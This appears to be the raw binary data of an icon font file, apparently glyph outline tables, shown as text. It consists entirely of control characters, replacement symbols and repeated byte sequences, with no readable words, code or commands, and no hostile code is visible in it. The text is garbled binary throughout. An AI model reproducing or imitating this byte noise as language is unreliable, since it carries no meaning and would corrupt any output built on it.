#JL
	R0R`Q00Q`R0��2<33<3DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S);GW\" 7676'&'&"'&'&4767622676&'&776767&'7'&#"2654&273�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd��-' !���4 (4N((-��
"10E1;RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;SK=B
AG��<	6'�=K=G0E00")2�j�S7IZo�%"264&"&462"&+"."2>54'6722>4.4632#"#"&"'676&'&>32" 7676'&'&"'&'&476762�"11E01"				,JJXH++HVH*	
+HTI++H�	5%!"0%5�
!%55ވtqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�0D11D0b		
�-&'.+HUH++H+	+H++HUH+�%5
0"&55B
5J5(DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S)3<G" 7676'&'&"'&'&476762>7.7264&"72676.�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd��,'gg',4��!"11D10�-';B"RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;3""3-  |0D10E0

B"<B�j�S)FOX" 7676'&'&"'&'&476762"".54&"2767654&%"&4627.>�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�:dvd:'&@C�C@&'��((�'#&RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�;d::d;MC@&''&@CMx(
'"'$
�j�S)<EN" 7676'&'&"'&'&476762&'&267>.'"&4627.>�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd'gg''`f`'�((�'#&RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;""		"##"	�(
'"'$
�j�S
!6K#35".737654&"%&376&" 7676'&'&"'&'&476762D'&�M=c9*�1D1CB���tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bdHNBALC9d�"00#Y0BDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S)2;S" 7676'&'&"'&'&476762"&4627.>!676'6767'4�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�((�'#&��"Pl
	

)KRDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;i(
'$
'"��>


&*)4HF	
�j�S*?T%".5#26765#37654&"12676." 7676'&'&"'&'&476762�;d:D'&���&'D:d�	
1D1
�+'<A! �tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bdo9c=NBALLABN=c9>"01"$B"<C�DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S)AJS" 7676'&'&"'&'&476762"67>2327>'.'264&"7>.�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bdvV�"
k�k

	"��(�'$&RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�YL


9CC9


LYU((
#'#'
�juR"ASfz�����&'.#!"2!7676?47&'&#!"&54763!23"#"3!265&74%2;26=4&+""#"3!265&74&"#"3636265&74&"#";26=4!"#";74="#"363226=4!"#"36274=;n9-��=TD0�
K
++�@&-,�\���	�<;:w����
���
/_�a0�}}	���#}})QT*���p5H<�*/@%P2~���6-'�4*Vz
-3!o	
E	
c!E
�j�R6P`u��454&6=47>'&7&"2767674'&&'&"17674%#";25&4747&"27>!"3!2654&#!"&5463!2�
-.(N


�D
8	4$
.8	#
	8��4		4�	!��f!..!�!/#!�y�

�..	
�*Z�		F^D0@U.+5q9(.J+
3J6
_U	
!"	Z�/!��!//![#���H
 !�j�R/?O_o�������!"3!2654&46;2+"&5'46;2+"&5'46;2+"&5'46;2+"&5+"&=46;2+"&=46;2+"&=46;2+"&=46;2+"&=46;25#!"&=463!25+"&=46;2&?64'&!"3!2654&#!"&5463!2�R��ZY_4ZXZ]�y��c>M�f!..!�!/#!�y�

@�R�()**)))��((())(())+�*)�j5
!�/!��!//![#���H
 !
�j�R
-T]fox��7676'676?&6757'./7'&'&7676&/&'&767>37676'%2"&46"&462"&>7"&>!"3!2654&#!"&5463!2�

T		"?
.


	M
 +e,/4U;.
6��8u�f!..!�!/#!�y�

. 0+#R

g	=!$F#,PZO)1"	( ,�I��/!��!//![#���H
 !�j�R*>NRb|2=4/"4376=4"32>?4'&#"76=4#'"3!"3!2654&!!!"3!2654&#!"&5463!2�DDbz�bDD��f��f���f!..!�!/#!�y�

+?uv	?+��f�~7p/!��!//![#���H
 !�j�R2EUo3767676?5!'.'./&'&'3#3/#77!!"3!2654&#!"&5463!2�H>	�M�
WV
)���>>8rr���f!..!�!/#!�y�

I��+	
H<%	�� t0`H%_98H,W  
e/!��!//![#���H
 !	�j�R,F3#3#3#'3#!!!5!!!!"3!2654&#!"&5463!2�����������R��R��R-�f!..!�!/#!�y�

/./.��./0I.�/!��!//![#���H
 !�j�R)b!"3!2654&#!"&5463!2.'77>.'.7>577'&677'67'J�f!..!�!/#!�y�

�F*"

	I
U	I
	

	!	%U%$U
.P%U%R/!��!//![#���H
 !�%2
##S(
R$R+Y$+&R#S�j�R)5!"3!2654&#!"&5463!2#'#373'J�f!..!�!/#!�y�

�h=>hili@?ilR/!��!//![#���H
 !0~~������j�R)��"+��!"3!2654&#!"&5463!2&=4676?'&'#"/&76?&/&/"'&/##/#&/?273763374767237&'&7567632?'&.>273676?2367&/&7>3?'"=746?'4#"/&?67'&#/&5'##"/#&#&#"2##36362?63'>.6?'4#"'&'5"?'4#'"'"/##/##'"#37237423?4376337'5>2767&#&/"64&3"&>J�f!..!�!/#!�y�

��
		

	!	
	#	
!	
��
	




6	


R/!��!//![#���H
 !��
	
%$
	#%))�

	



	
H�	


�j�R)!"3!2654&#!"&5463!2J�f!..!�!/#!�y�

R/!��!//![#���H
 !�j�R/CL\mz����54&#!'%6'&/&"3!26=4#'676"/&66?2/&'&6"&46276?2"5'7674;2+"&&=467+"?676;2+"&7676;2!"3!2654&#!"&5463!2������k	`
�	



'.1
-�>]7	#g;,��f!..!�!/#!�y�

}2G
c����

i


N"c�_0	�
"
�/!��!//![#���H
 !�j�RS[k���%"&'67"'67"'&/#&'67"'67"'&/#&'&/###&!.'56'&'6'.#567"'&/&'&567##!"3!2654&#!"&5463!2�




	

!!
	


)�	
"�



<	
	)$�!4#

		�f!..!�!/#!�y�

�<8','!%!)/N
A�	�Uw
j	�/!��!//![#���H
 !�j�R,Yi�36?6576?4?5!/&5'&'&'/.5'&+?67656?#&'37657!6!"3!2654&#!"&5463!2�2^

�D���	�14"D$+����A��f!..!�!/#!�y�

N"��+	�<h\&	��#	$$	vb1J&�" 	
6

R)($1��/!��!//![#���H
 !�j�R7]m�2>.7&#54&+"!"#"73;2&5!26532>'4&&'&'&'&'&"&".'&/#&#53!"3!2654&#!"&5463!2%
�
��
$

%
c		



��f!..!�!/#!�y�

Q�%
(
��'
��
�z/!��!//![#���H
 !�j�R.H"2>4."&462'"264&!"3!2654&#!"&5463!2�<d;;dwe;;e<%44L44%$$3%$<�f!..!�!/#!�y�

9;dxd;;eve;��5K45K4�#4%$3%�/!��!//![#���H
 !	�j�R(_t�����'"'&'&5476?67676'&/12367676?76'&'&'&76?#"'>7'"%"327676'&'##"'&'&3547'327#"327676?'"'&'476&/#"'&'>7'"276#"'#3327676?!"3!2654&#!"&5463!2�
		

%
.$
H+
		4 !5	 J*D
.f#!%4Q�	E''1?
:2)%
-�A4/"a9BFNB6*
	��f!..!�!/#!�y�

=


!
	
'2R		

""


)
!

	
I	
$*m			?

	

			

�/!��!//![#���H
 !�j�R2fv�3767>76?6?6=!/&'&5&'/&='#?#'7463233&'#"3!"3!2654&#!"&5463!2
�J6(�C��,;	�,
4'8-:�$I5���f!..!�!/#!�y�

L:r�+
&L�>&	�`17%		H)��
%	
�K8L&5:
!AU/!��!//![#���H
 !�j�R3C]>4.&"'&'&"&"&'&'&3>/&!"3!2654&#!"&5463!2? ,-@.-c
, 	0
=�$!4��f!..!�!/#!�y�

�+@.0@+h	
	
	2		(
\

)AE/!��!//![#���H
 !�j�R	/I%!!33#'333#'333#33#!"3!2654&#!"&5463!2��?V>Yl$Yl#Yl?Y%�f!..!�!/#!�y�

|��"�`~"��~"������/!��!//![#���H
 !
�j�R(5?Kn{��7676'&'&#&7&'&476'46.7#"'&476'6#".6"'.&'&'&/7>76762354&?265656'5!"3!2654&#!"&5463!2qJSL)1.:R+D(!�!!?M	
		
	�
7�4#%'b:4�#3;+I841]r+,$�E��f!..!�!/#!�y�

2:B)"
.K!0_	"
E
%&G
 

!�

%
).5	
J	
/%/!��!//![#���H
 !�j�RVgv���%65?474754"1##&#;036327676?65?43?2'&#"767676%>.676&?676&%&32767676!"3!2654&#!"&5463!2�8f// 
'
	*�)�b
	�

	
��
5
 �f!..!�!/#!�y�

�Qk# 	�





\:"
�
	
Oi
]5		5/!��!//![#���H
 !�j�R)jr~��!"3!2654&#!"&5463!2&+"&'&'7676=676'4/.+"3267673267675&67676747&5467670##"'629J�f!..!�!/#!�y�

^3-
+	

!(
8%XY H�2'�
4
#K.,
R/!��!//![#���H
 !��
(>
#	
	)!9,.5*<@


�
;�
)#
��.".�j�R$9R^m}�"2>4.#"#'#7236#76&#"#73337#"#'#6?63:'&+3274&'&#"372674&!"3!2654&#!"&5463!2�EvEEv�uEEu�


�"�	
'
3	%�	��f!..!�!/#!�y�

�#<F<##<F<#��,6	>�B#'A 
&		7�/!��!//![#���H
 !�j�R4=BHN^x&'5#&'5&"3#3#353635335#535#535#0#'&473#53'53#&473!"3!2654&#!"&5463!2V[WV[[[[\S][ZZZZZZ�P[\Y[[[]\\�f!..!�!/#!�y�

�[\ZS[R[H[T[Y\[][]��U�\][S\U�/!��!//![#���H
 !�j�R)8B!"3!2654&#!"&5463!2&+35327654'&+53J�f!..!�!/#!�y�

�!,�[:F'(F
<=R/!��!//![#���H
 !@���!#6# �
m�j�R4BR`p��!";2;2+";26=4&+"=4;2546;2=446;2+"5#!"&=463!25+"=46;25+"&=46;2!"3!2654&#!"&5463!2�*�(�(���SS
���f!..!�!/#!�y�

\1��__#0yV@**p/!��!//![#���H
 !�j�R#=
-'7''37'!"3!2654&#!"&5463!2���fJ��JffJ��J�f!..!�!/#!�y�

'^_`^��%?@|$@@c/!��!//![#���H
 !�j�R
 :
-'%''%'!"3!2654&#!"&5463!2����ll��ll��f!..!�!/#!�y�

;^]]^�7'^^'�6'^^'L/!��!//![#���H
 !�j�R )JSc}326=4.#"3#";5467"&462#+"3276=#53276764'&2"&46!"3!2654&#!"&5463!2�w#"3$$v�(	 (,	



�-,w# ;v�
		�	



�f!..!�!/#!�y�

g#q"	
-#4" 6-�


-5,$q
		*-9$<��


�/!��!//![#���H
 !
�j�R
%1?MXdt�&"'%&3%25'425&%"?676'&/&?6&77676&'&'"/&"6/.!"3!2654&#!"&5463!2R�g���it&.34��$P)�.F%f�"Dp9Ae
$e5�f!..!�!/#!�y�

��,A[m�'0ko+���T*�
�j�$F/c�h��h
/!��!//![#���H
 !�j�R#'+/3C]7!!3#3#'3#3#!#5##5##5##3#3#3#3#!"3!2654&#!"&5463!2��Qxxxx�xxxxBBB�xxxxxxxx+�f!..!�!/#!�y�

~� G!G�G!G!�zzWW55�G!G!H H�/!��!//![#���H
 !�j�R#4D^2>=4."".'2>=".'2>=!"3!2654&#!"&5463!2�8_77_p_77_85\97_p_79\55\97_p_79\!�f!..!�!/#!�y�

�#>##>#%!43##h!�!g##g!�/!��!//![#���H
 !�j�RJn~�'>'.'4'.727>.&">'&'7>'&'77>.&&'&'7>'&'67677677!"3!2654&#!"&5463!2�*	n/,$	
	$ a?N
p	%p
T@W
)+
o*��f!..!�!/#!�y�

d`			EQ	OH5L2-
x,y34G,


`/!��!//![#���H
 !�j�R#3M!264&#!"!"3!264&!"3!264&!"3!2654&#!"&5463!27z�����z��y��f!..!�!/#!�y�

�&&Y&&�$&/!��!//![#���H
 !�j�R9Ic2>&"!#'%!'&"/&"&"'&/&/#&!!"3!2654&#!"&5463!2d
��x�^��`Q.��=&
	&)
md�f!..!�!/#!�y�

6���2���m��M,
H�/!��!//![#���H
 !�j�R#-6IT]m�326'.#&#"'"013!26=4&+"75&2.6"&>%?4&'>'.#"'>."!"3!2654&#!"&5463!2|E�
* y=

�r$$3%%v
r21
�%&&&�+
�f!..!�!/#!�y�

�
�
�N#%#2&k�$&Z 	"
&$'4$))�/!��!//![#���H
 !
�j�R	)=M\kw��"34."#&63>564.#";65%4.'#"65&5%'"73=4&4+";&75&7'"73=44+";5!"3!2654&#!"&5463!2/>�
	��

A
�x
		{J		W�f!..!�!/#!�y�

O�.�
W��
!��	�>A AZ��!	t	&oo

v,/!��!//![#���H
 !�j�R8Vgl|�&7>725&54&767>%&'&/&676'&&&'.76767676'&%6764'.7!"3!2654&#!"&5463!29^?Y<)j)-9.0
"8$8<|'
5X<<+��IQIHQJq-C���f!..!�!/#!�y�

89>Y	B,<1,�
'()~;TT;�.%2G

"
�,%#'(#%X$#(("%$*SH/!��!//![#���H
 !�j�R)6!"3!2654&#!"&5463!2'#'#373#J�f!..!�!/#!�y�

�5M4+[Q^13^Q[R/!��!//![#���H
 !�������z�j�RJ}��##3#3#3#3#3#"&4675#535#535#535#535#535#535#";26=4&01;273276?64&/5'./#!"3!2654&#!"&5463!2o_ / k)::)�);;�	
d�f!..!�!/#!�y�

<,  ,:)�)::)�):��	M/!��!//![#���H
 !�i�R>KXer�.'&76?'&'&'.'&'.7676/&'&2.4>4."2>%".4>4."2>67676'&'&K:
1D,C�M/(		-.NG-=k"1D')_\-'�3X46ZeW34X�5>6!6?5�3XgY53WfY6K5>5!6?5�� &(,3).C#

R
0>!)"A&�L7/R$
	2fE(Zq$�#
0�5YfX45WfX4�5!4@7  5�3Y64XfW53X55!4?75�+ (8T)

���,147;`di~��"'&'4#'&#'7'#&#"2>54/73572>4.%!'&'".4>3233732737'7'7&".5467>/2264&"#";264&
�e�.
7]77]o]7M\H7]o]77]���3�T�m-MZL--L-(#Z�T2];�-M-A3
-L,-L��)99Q:9?\\(s
k"I��#7]o]77]7
 ��E&7]77]o]7�v2BB	�-L--LZM-�==#U7H(��-L-7V�

�-MZL-�9R99R9���>)6"26=4&%"!54&"26=!2654&"26=4&7  .���!,! . .  o.  "�""�"2"q##��""�""<"$"�""�"�W?O_��326=4&+"%#"#!"&=4&+";26=463!2;26=4&3#";26=4&#";265'4&%#"#"&5'4&+"37265'467%2;265'4&7#"37265'4&�(		(

�(	
�i
	(		(	
�
	(

S(

(		�Y(	
'	
T(
	�h		(

(	
�

(		R(		(

\
�		�
�	C

9		�

L

C		�		�		�	��
�	
�	
C		:	
�
	M		C	
�	
�
	�	�j�ROQUY]264&"7'7'&'4+'7'777''?26532657'7'77>'77/57%77'�$44I44�@@�$�	
���(?+	'>%�))	�(@(
'@�@��>?{?�4J33J4��GF�!��#G &#G �-����gc2�#G %

#GFBGG�H����+.49=264&"3#%#!'#35326=326=33##767%5#573#�,,>,,�+IIK��II{#�#�II��m9��RRs1�>�HHY,>,,>,���:��H������{ l}}�/L��/%��w�E<@DH264&"7%7>&"!'&"'7'726=326=77253%7#33G22�_�������

ii�__�('�_��x�__�2G33G2�(��;�����kl�Tv���qrrs�;;�B�����j�ROQU264&"%7'7'%7'6&'7'7!'77'&'7'72653265?75?�#11E11��@@�@@Q??�/ ?����%A'
@�('�)?��??t2D10F1??{??
AAG. @��&?(
?����}A�)@�g@@�j�REN%&'&'&'&'&/&#&'&'.#"32676&#".#"#?>732767>"&462�01./11qF<d;;d<Iu#)JM-<^X )\#+70FL*=�u%%5&&�

IL(62)*

AQ;dwe:XE*6/%+J9��9K-	
	7Au&5%%6%�j�YF&'&'&'&'&/&/&'&72632&#".#"#?676732767>�89569C3E	

1VY4.Q9
	f&/63)3>8"PX1G
VV.?:/1
 	
#7/? 7$*2'F+�bA,+4@K��N,L676?6&/&&776767654&'&'>=4'&'.'&'&+3' ==;:\-1<CGJD=0-WIM$	$6,&5>=45CIQT?E F>UQJ[~$	
$	��i{%"3!26=4#?67676'&'&'6?676'.'&&'&'&'&'656&'>54&'7''&#6%45&767=6'6.


	 	$(!
		
		
#"3)#	%"S"#
$".6.4.				
	BD	
		
$$!1(2�-E;
$). ���!4Rg������7St����6767>'&/&'&'.2656'&'&7767676?6576'.7"?6767676&%>5'&'&'&676567>654767>'&'&&'&274?6%?6767>/&'.&'&367367>&/&'&'&'&'&67>?67>/&'.;2676?67>'56/&'&6/&'&76'&/&#&'"'&/&7376&763'4'&'&'&'.67676/.2"76765754&2367676764'.�
1m& 	-=,	�$ (.2�>/<.3/(*	� #%I	$+I3  *<-#-!
-	
7�I		1�	

�

/F<
(E?Zg
	
,�	

&J�
.6

	
 /."

		
"F*B 
(	$�%�	
�.
!	L#'
	&6)>

��03[G/VLs2$	!	*	
	(.m#,MC"./�$/#*"52ci4$
:(�&0%(2EZ;N+0
uv\
5
&(
�&//��=
C&
M1.�"'		
!l
&"F	�]

)O	%' '�
@�%
	)' #�-#8FMM	5(>L	

�+Y���������622?'&/&'6767675767676&'676767#&'&"76767676732?'&%67676?>7676363'&'&/&'767676?'72?&'&76?&'&'&76?.?676&/&726?'&"67&'&'&'&'&6&/&'"6&'&767[$
5	
AE"=zU<
p�@'LJ�	
!& *,<�_8�S:r"-��B!.Z1
1:B	"8!�c2/_J� Q	

		
*A7
&	j#*
	2
	
(;*p"	
M	
Q8	
	
A
z	
@	 
l
	�#Qd		�
�	$:
P	����,04Nf&'&'&'&'&'&'&.'"76?9071#?'&'&76'&67>'&'&7'7676&�.)C@<K6D6*2*6


6

	6�����P��(<OF[�d/9#< $<�?~�fM7�:K/)+5)IGDH$"�B+'
8-!C+'-�CE|W�/����/8
47"DN;>*
 ?7'gn	
6. )&S��6G76?'.?>7'.?>7-&'&67676.6&%&6?6&��YQ
	RR		R2��D!& 7$���	
Om
�,

-8,
	,\�j.*#*�7o�


�


��-&/76&/&'&7>7676� .D
9Z�V\(2
$2:>^TMf�3(
�wg;H;\%		
	 oRAF<�� !(@H\q�%67676'!767>;27%677&'76&'&67&/67'&5&767676&'&'&7676&'1#'6&'1#7'&76�'
�3^&	�	!��_^rFC_@ 		!JT	

3

!"	

g

#�&!% 	rD;v
"c.9&(36�(E

2

RNP/.	�. .
E�5"
-
2!2b35%(&
3����)3>M%7676767!&'&6&767&/$'76%6'&'&'&6!&'&'&�+PMMQ.		�#	4,�~��J�:&24���
%A}cJ3q8%+2?-! ��	'	�$�./-	&6C*o-	c�N6;A?12UC-3,O"�UZ<$*
��{
$&D���?KWco��#5>'./"#"'.#"#"'.#"+&+3!267>=4."&=462"&=462"&=462"&=4627#%"+"&=4&+.7>76232676'>322762326;3232"
1 7 ";"
$	!&@&4N2S1#<�		]	
	]	
	]		
p��

	~9(*
+$

	#�)F*3*<�e&"1	"9" 7�:&@&D35V3J#<#����������

77#
(7	

#��*I.T;+
��k0=_������&'&'&6?627676?654'&'&'&67676/%6?&/&'&65&76?6'&6/"66?&/&/&'&'&6'&'&'.67676%6?6767672?5&'&'&6?6576'&'&7676'.7>76?6'&'76�+)$01D:&4,C@.�

		��G!0
);
	
a3	h?

�;2


�:!- (<��	,&��&!
$'�	(.�	&
�#68$(W3$!5%&	

 [^&&
 ��
>!;,	749=�J	
  "Mn95	F9Jq	.6
>

	�9
*+%.�
-$,?6H'!			%.	1+"
@g����,0����)"3!264&&/&"#"&/&"#"'&/&"!!!767>6?>76767>354&+54&"#54&"#54&"#"327265'7264/265'���

.
T	&

&&&&

&&&	
%��`��`"$
"

(

 �HH�
	��
�I$		$$		$	$		$�su"	
_3	

	3[		[3	

	3	_�>((>�9C01&"'&'&'&'""&5&'&""'&'. 767654'&			2=F
,$'"
K%#<4hQQi4<!#�@C]a	Uw�?	
R[IB	+417G'#


#'G2/2��q+et{�&'&/676'&'&'&'&'&&'&'&&'&'&'&>76767>767676'467676'&'&54&>&76763T@ )'"$	
!+F	#O=4Z%	
U	!N(
F6N1&2"	
��
.
	j*
�-	
	&%"


1 ',"':'#	/N(V6$0%..O?
;!%9�B
2#����.7@IR[dmy%!"3!26=4&'!"3!264&%!26=4&'."%2"&46'2"&462"&46'2"&462"&46'2"&462"&46!264&#!"o�
#�#�""�!!���;84���48;�_K__K_oB

��z9##9�&4&%6%]L{*'))'*|LuQQQQQQ�����{�&'&'&76'&#"'.756'./.74&/&'&'&'&'.26'&7676>67676?6767>'&'&'%&'&/.'&676'&/.6?6'&/&'.676'4'&7>136767676?676476767>&'&,/2"( <"3-=S:6

25

 	+#0s	5"@)		

(
 

	
, 	}HV��
	!C> 
 (6Q,


	
 |�g\3"0a<		 %47$$8I>	:
"$	$'
#!h&nVJ15%

		
5@&## /%(
	

/7 	

!/
[n�


!
!

�`ax&'&'&'&/#'&'&'&'&/6?&'7?&'&'&57'&/7?>'&76767&'67&#'67&{ 	v
TC"	8 �
			�-�Ob?*/)n9=o^	�%
S
&:/(

6


2G!
#hB?$+1>
c=1AD*+(G
/����@EYq����f�������!-EITY����6<H.@�����Si����>65.'""/76?5476&/&/7'&#.'#/&'&#"''6276?'&'&"7&/&'&'&#'67.'&/%6'2#&&>7&476767"/?6?&'&7'#?3">7&7676'676/7373>'&'&"767676?6?676'&'&'&'&/'76?676?67>'<'>7677%4'&'&/&#.'4&#/&31>3'7?34&'.%#3767>'547>'.76'56'4/64'&76?&'&/'676&'7667>'&'&'6327675673>?67676?6326?6?6'5&76&7"654/&'54'&73765&6?'6?.76&/#'&5'&/76'&?3676#1&/&'&"6'&'5&'&'?'4&#'6&"./&'5.&'&'&'&4'7#&&'.#&/765'&#&'&'#".#&&/&'&&?#&"171&76?6767>##'&6>7'&#36'&76'576'&673"'&'6;2672?>76>76?676316'6?657"/767&/76767'"'74367676'&'&"'.6##1#.?67"&#&5463232&7536&'&?&=462676'&6&'66&5676;276?6&7>?7676?676232'&5'.#"5&&&'"#&/&#&/76"=67676&'&"5476&/62'&"#6?&'#"&74?476?673'"&'67776376?#"'"#&'6'3?7"&5.#'&'"&&756'&767&'#&'&'.'3767.'&77&6767&67676&'&/.76&'&747&74?6776765>32676/>'&/4765&'67>5&#56'.4775656?>2'.'&/7'5.&547>7>&'&7576'&'54/&'&'76762?>2?'"7>3'"67>7'&#&#5637'&'767676?'&'.#/&"&#''76?67654775654'&'"&7'&'&'&'&'&7467'3676?''76372767"#632'46?676743767>53754'.%7/&'&/&&#"'&'&'0'&'&6'"7&'&#&'7'#/76363'763&/&&#&'&767&23276767&/"'#"7>'&/77#'"5'&#'#67>7&/72727&'7b
 
	


*�	
`

 *
�
			
+:48

	/	

2	
B

		

		

 	��

	8

)	
	

I
	

		

$



		


	
$
		



	
		9&	 d
>	!$	
B	
v		
			

	

+	


	�
	a
		

	
	

					



0`E	
*
�				?#
�-�

.	
	

	

	
�
	


k"03
	!
	N
	
:��					
##Q

	
8		�


W

&!	'		<		
�


		
		


$	
5
(

""
"	�	

		
		
��
		

n

		

		
		
		
	


	
		

	

	





	
		


	
	
	N

	o$	D
�
9
�		�


A
	X				

{	
	p


~
�p

%
�	$

		
	
		
	
	
$	
		

�d
0$1
		
	A
		'
 
�



	

Z��

h1	����*HQct}��745&747676&5&/&3!26/&"'&4?6&264.'27>&'.%#">'.#"26.%4&"26&6.?	H�	M֢:T+�#!(p>4']'/� *

o0D00D0� ..G0)&n)��)*��*�.]/�>��+-)	Py,cK

	��#00D10d*3
$�(*�&' (O''���*<@&'&'.'.'&#"&77627>'&!5&'&!!�
;R;$-E5+J?C [<VB
5y7?M3O"��vr(0�>1���)�+"?;V&,"8C7|T
:(#*	Ec�<D><N��3��AJU%&#"&'&727&'&'&'&'&'6735"2>54'&/67672>54'&&'&'&/�	 !@!,I2 *#!$-(*Iu�&B*,-LZM-*'?<!-!G#(-LZM-*'�KF,&
�
i[{Q0J
&.!$#��i|'(@-M--M-='%	f`�TY�dvA*-L--L-='%�ID
�t/C."76767>'&&7676&'&676'7�x�F5M
!2{7>@<F-+�E@08

C>MV�	"
@
A!�<B#Q1!
^

"#<;�X'AM!)�
	4

����eu.6&'&"&67>76'7376767654'&'#"'&>3276767376767>763264!"3!26=6&�	

)$$(0(
dUS02$?'l�p(=!+
.K(J6	

 (($F���

$"
.-JMY?D" A=95.7*F.-	


&;($$(�z��PCcjv�������7&'&/326237>7676&#!"!6'&'&'&'&=4#>56=4'&'&'&/!7'67!276"'&'&'3734#"'#"&'.7&5467&7>;676326323&'&'&32?&'74'"7.#&#"�Qe�*
'WY2q':E	�
A>&
!'"	�	"'! \

C15�51B�bkc�)��!!+	
*	O��#h�IP2*	;	
	
*		*A =# 
8 2'>fK4

#*=

*0	a
qE �F(QE

?W)F:�o		k~y�
�@5.aC99C]2"4>�,�$1&/<.-l
-�%
	
!



0&5	OU# �Z&
?\L
V��Sf236?6?&/7&#54&54&/&'&'&4767626?6#&123>767676'&	
^��9&�		
(@.	3,*

'JZxU_,)0k:>' xJ?
�	�	owt%L{

	NP��


)M(1aWq@!iZpZGP��&/Ld�&/&'&76767>76"&4627"&462'.7676767676'&/76767676&"'&#'76?67676?2�lH۳H)$~dRP^�$��:L<U��'%	!CVE_�o4!a	"4׭%&	)'��E�
%'3$<��8
	'Z.��-
�)`&+%(%>�	<9�ej�Y$$5�")"=	$-$*+V!
7<
*<	,:	��

8DQ%"&'#!#!7!#"'&'1.#!"+"33>237326=4&#"&46;22654."�%?V'A&L?�7���

��

b?J?Y	�K		K		,,>1911�!��G!��

�!!�	

	�+5%**0*����-@.&'.'&'&767>767676767676?676�T:

�@� ?O
��4
{[pOB?Z2"$+
5(	4
H�H��4
 *	+K^zPAX>:��
$/���n��676?637276761"7125&76?6?65&'&"&76?676'5&'&##"&676767676?2574#&&'.#!"3!26=>=67676?65A& 	&

			:	
*"
 (
G-]%�0(%	�	$J.
o	

�	


	
	
	
��3". �k-%		%-8=ZH�����)='#7%!67654&'332676'&'&&/&'&/>7!p��G: !--)&3)',
4*l	D�9D�O4&�%'V<�2FIQF@>22>@F@u/1F\w�o\B6�
	1T -���)3?L���&547>7&767'7767374?"7467637>54&&5476764'5654&'#&#"#2033276=4'67>'&'&?6?676?676?6?6?676?63?�*"!
�
#I
�###
			�.		=up8./IDpL+
	'

$	


/;�! 	%.
B;'&22e
$��qP
P��
$	�	
$	
r
����������������������%#&'&'&767676'&'7373#3#3#3#3#3#3#3#3#367537#5347#535#537#537#537#537#5367'367#'&'367#"&/&6;2676767676%&'&'&54'&6733#'#5#'67#7#3#&3#&#53'53#5'3#3#6533#3#M,'

P(;53,+'&#"  

	#$&&)*.069FLI
	%		"G	3�5&�X
-> ��&A!X
@8>"	H2%.19D.C



#
0+G;U2eW%>"'c
3,
&.	&,4	(*


/
+(
4
,&
.
&%	
,*;D":(1"�I
	J
{%4("*%I#-3*"0@,"in//	_33"e**�,�*((z
�
�i&=Nbn|.'&/&76?#&6767676&6?676767'&'&?67676&%73&7667&'&767676&
%$6.$	$0
-)�V
8$)��
'##)1	Vk	8�,!?"&"��""u(!-_�
G
�DA
-(N% "ur+
(75>B%�
8,$	1	pFF3G
5f�

]cMMI)58/+5!B�$`
!=����	{�>&6>'&5>&764&76.676.767>&'&67>'&7>&7>'&>&?6?6=65732767676?6?3763732/&/&#&#"676?6?67676?6726&67276."676&+67676&726&#7>73776&'"7676.7676'4&6?3>&6767>'&"#"6&�!0


		!)
	
 
*

4#


9$ 
	 


	

	
*!/7.%.7
.8*.9
*-6.%+&(;*�-7�
#&
	0-(>+=,=.	=,	

&+<)<(	%(
8	& 
	
2

 $)

	
		






#
�
���..?KZhv��������&'&7676765&'&'&56767676%27676?'>'&6&'&'767376'4/&'&'&'27>'&&76?676&'&767676'&676763&'&>'&6'&'&'47''&/767676&'&'&'&>7&'&'&7>7'&'&7676?F3Y��X^h%iPYnumhd"!> �dhf`ITbdi_[`UX�x	


}	
�	�	
o2�	
�8Igfc]V!R;Pgl^QU'�x'B 
+

-(
")**%%'!�,"	

	1	
	{/5O/6;yTm�aF-9!?>mfu���es 0-CMwc^k;;&*KO~b�
			u
	 	�2	��
	
�		�")
,%1&794^dbjI4(5"14Unmc"
&!
^
$$d	

?
!j		��
	

4)	'#


�!(6%��%2Py"276764'&'&.'&4>3">.45<'5#26=#5##5##7#26=4'&7673675'�QFD(*)(EF�FE())(EFWAm  BqD>n!##"s>=f=?izg<>ip		��
	�))DF�FD)))(DG�GD()��B78�o@>59�:6>�=h|h<>izh<�+,X��
 )6@P�

6������� #
�

� %���z4@LXd��%'&'#"'&#"''#"'&'!67676?6?67'&+"=4;2+"=4;2+"=4;2+"=4;2"&'.'"&''&#"33276?6767637>7>7327>54.%2>54&"� @+	:		j
	!��`[\K
G1
"("
1G
,K+	
	(6*:	8)+K��".!�,'0�R	.Z8���������1KK1,K,"=! !?#,K,�""��%)37KT54&#!";3#!5#535326'#37335#73#373373#&'&'6'.#!%#&>7/���==>>��;��~�����";
8#%R��2$#k11��s��S\\�M#��\\���9;!		#$6#/"���)6BKXer|����"276764'&'&6.6>&67'6&/.&6?>.>7&'5.67&/.66&/."&=7"&=37"&=67"&=67".4>2�wfc9<<9cf�fc:<<:cfc		A%� 



CTE>?�%@%%@J@&&@<:cf�fc:<<:cf�fc:<�
H	h				R

	�

@				U+�kVRR %?K@&&@K?%����l�&#&?6'&'&'&+&76'.'.6?6&"'#"/4#1#'&767676566%6?>766?676766?6?66?656'&5676&'&'&�


&	'

#3
NSI
	
#Jk\jT]ta�� 
0
	93�
&
 
	1+'
I
>8@*$0B,#Vl��
	
'	$*	$
	
G'.

3���0Vcx&'&'&/&'.'&'&76?6367676''&/&'&'&7>76%>.&'&67676�	3
CW��� !*#&3
B;(!{;_7<*93C("J:%,YLu�F8
24�4.ABYZ@AX"#E@(
	!_(BKM�f�#C*

%�?}L+"
:&8quU}$7?"R#;�AY[?BXZ@W
  
?
